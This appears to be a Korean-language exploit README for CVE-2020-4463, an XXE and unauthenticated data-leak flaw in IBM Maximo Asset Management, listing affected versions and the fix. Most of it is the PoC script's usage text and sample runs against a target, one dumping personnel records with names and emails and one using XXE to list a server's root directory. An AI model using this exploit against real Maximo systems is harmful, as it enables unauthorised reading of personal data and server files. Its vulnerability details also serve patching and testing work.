
IBM Maximo Asset Management는 XXE 취약점(CVE-2020-4463)을 통한 정보 공개(Information Disclosure)에 취약합니다.
IBM Maximo Asset Management는 XML 데이터를 처리할 때 XML 외부 엔터티 주입(XXE) 공격에 취약합니다. 원격 공격자는 이 취약점을 악용하여 민감한 정보를 노출시키거나 메모리 리소스를 소비할 수 있습니다.
기본 점수: 8.2
벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
IBM Maximo Asset Management 7.6.0
IBM Maximo Asset Management 7.6.1
IBM Maximo Asset Management 7.6.0 이전의 모든 버전
Maximo for Aviation
Maximo for Life Sciences
Maximo for Nuclear Power
Maximo for Oil and Gas
Maximo for Transportation
Maximo for Utilities
SmartCloud Control Desk
IBM Control Desk
Tivoli Integration Composer
수정 버전: Maximo Asset Management 7.6.1.2
이전 버전: 아래 링크의 해결 방법 참조
다음은 이 취약점에 대한 PoC입니다. IBM이 언급한 버전뿐만 아니라 7.6.0 이전의 모든 버전도 취약할 수 있습니다.
이 PoC는 시스템에 존재할 수 있는 2가지 취약점을 확인합니다. 인증이 구현되지 않은 경우 악용할 수 있는 데이터 유출 취약점과 구성에 특정 값(mxe.int.resolvexmlextentity=0)이 설정되지 않은 경우 악용할 수 있는 XXE 취약점입니다.
python3 CVE-2020-4463.py --help
usage: CVE-2020-4463.py [-h] [-x [XXE]] [-d [DATALEAK]] [--url [URL]]
CVE-2020-4463 PoC Data Leakage and XXE
optional arguments:
-h, --help show this help message and exit
-x [XXE], --xxe [XXE]
XXE (Linux/Windows)
-d [DATALEAK], --dataleak [DATALEAK]
Data Leakage REST request MXPERSON. May take a long
time.
--url [URL] Target URL http://, https://
다음과 같은 응답을 받으면 두 취약점 모두 존재하지 않는 것입니다.
Error 500: BMXAA1268E - No user credentials.
데이터베이스에 항목이 많으면 시간이 오래 걸릴 수 있습니다.
CVE-2020-4463 git:(master) ✗ python3 CVE-2020-4463.py --url https://10.0.0.1 -d
<?xml version="1.0" encoding="UTF-8"?>
<QueryMXPERSONResponse xmlns="http://www.ibm.com/maximo" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
creationDateTime="2020-11-16T10:42:49+01:0 0" transLanguage="EN" baseLanguage="EN"
messageID="6927296.160551977018422092" maximoVersion="7 6 20170418-0100 V7608-61" rsStart="0" rsTotal="4374"
rsCount="4374">
<MXPERSONSet>
<PERSON>
<ADDRESSLINE1></ADDRESSLINE1>
<CITY></CITY>
<CLASSSTRUCTUREID></CLASSSTRUCTUREID>
<COUNTRY></COUNTRY>
<C_DESCRIZIONE></C_DESCRIZIONE>
<C_MATRICOLA></C_MATRICOLA>
<C_QUALIFICA></C_QUALIFICA>
<FIRSTNAME>Lxxxxxxx</FIRSTNAME>
<LANGUAGE>IT</LANGUAGE>
<LASTNAME>xxxxxx</LASTNAME>
<PERSONID>Lxxxxxxx</PERSONID>
<POSTALCODE></POSTALCODE>
<PRIMARYEMAIL>[email protected]</PRIMARYEMAIL>
<PRIMARYPHONE></PRIMARYPHONE>
<STATEPROVINCE></STATEPROVINCE>
<STATUS maxvalue="ACTIVE">ACTIVE</STATUS>
<TITLE></TITLE>
<USERNOTFTYPE></USERNOTFTYPE>
<EMAIL>
<EMAILADDRESS>[email protected]</EMAILADDRESS>
</EMAIL>
</PERSON>
CVE-2020-4463 git:(master) ✗ python3 CVE-2020-4463.py --url https://10.0.0.1 -x
Error 500: BMXAA4160E - A major exception has occurred. Check the system log to see if there are any companion errors logged. Report this error to your system administrator.
/c: (No such file or directory)
Error 500: For input string: "bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
"